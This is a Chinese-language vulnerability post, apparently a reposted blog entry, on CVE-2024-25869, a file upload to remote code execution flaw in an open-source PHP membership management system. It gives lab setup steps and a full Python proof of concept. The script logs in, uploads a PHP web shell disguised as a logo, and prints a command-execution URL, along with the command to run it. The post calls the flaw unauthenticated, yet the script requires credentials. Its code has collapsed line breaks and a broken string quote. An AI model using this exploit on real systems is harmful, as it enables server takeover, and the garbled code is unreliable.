免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
PHP会员管理系统-不受限制的文件上传到RCE漏洞
02
—
漏洞影响
Membership Management System是一个开源项目,地址如下
https://codeastro.com/membership-management-system-in-php-with-source-code/03
—
漏洞描述
会员管理系统是一个开源项目,此漏洞的存在使未经身份验证的攻击者能够将.php文件上载到Web服务器,并在运行应用程序的用户的权限下执行代码。
04
—
-
下载代码,解压后放到小皮面板的网站路径下
https://codeastro.com/membership-management-system-in-php-with-source-code/
2.创建数据库
create database membershiphp;3.初始化数据库:找到MembershipM-PHPDATABASE FILEmembershiphp.sql
复制建表语句到mysql中执行
4.找到MembershipM-PHPincludesconfig.php文件修改密码
5.一键启动
6.访问页面
http://localhost/MembershipM-PHP/
05
—
漏洞复现
漏洞复现成功
06
—
漏洞扫描 poc
python版本poc文件内容如下
import requestsimport argparseimport uuiddef get_session_cookie(base_url, username, password):login_url = f"{base_url}index.php"headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8','Accept-Language': 'en-US,en;q=0.5','Content-Type': 'application/x-www-form-urlencoded','Origin': base_url,'Referer': f'{base_url}index.php',}data = {'email': username, 'password': password, 'login': ''}proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}session = requests.Session()session.post(login_url, headers=headers, data=data, proxies=proxies, verify=False)return session.cookies.get('PHPSESSID')def upload_file(base_url, phpsessid):upload_url = f"{base_url}settings.php"headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8','Accept-Language': 'en-US,en;q=0.5','Referer': f'{base_url}settings.php',}cookies = {'PHPSESSID': phpsessid}# Generate a random filenamerandom_filename = f"{uuid.uuid4()}.php"files = {'systemName': (None, 'Membership System'),'logo': (random_filename, "<?php system($_GET["cmd"]);?>", 'application/x-php'),'currency': (None, '$'),'updateSettings': (None, ''),}proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}response = requests.post(upload_url, headers=headers, cookies=cookies, files=files, proxies=proxies, verify=False)if "success" in response.text.lower():print(f"File uploaded successfully. Path: {base_url}uploads/{random_filename}?cmd=id")return f"{base_url}uploads/{random_filename}"else:print("File upload failed")return Noneif __name__ == "__main__":parser = argparse.ArgumentParser(description='Login and Upload Script with Random Filename')parser.add_argument('-u', '--url', required=True, help='Base URL including MembershipM-PHP path')parser.add_argument('-l', '--login', required=True, help='Username for login')parser.add_argument('-p', '--password', required=True, help='Password for login')args = parser.parse_args()phpsessid = get_session_cookie(args.url, args.login, args.password)if phpsessid:upload_file(args.url, phpsessid)else:print("Failed to retrieve PHPSESSID. Cannot proceed with file upload.")
运行POC
python3 script.py -u http://localhost/MembershipM-PHP/ -l 'email@mail.com' -p 'password'
07
—
修复建议
开源项目,自行修复。
原文始发于微信公众号(AI与网安):CVE-2024-25869
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论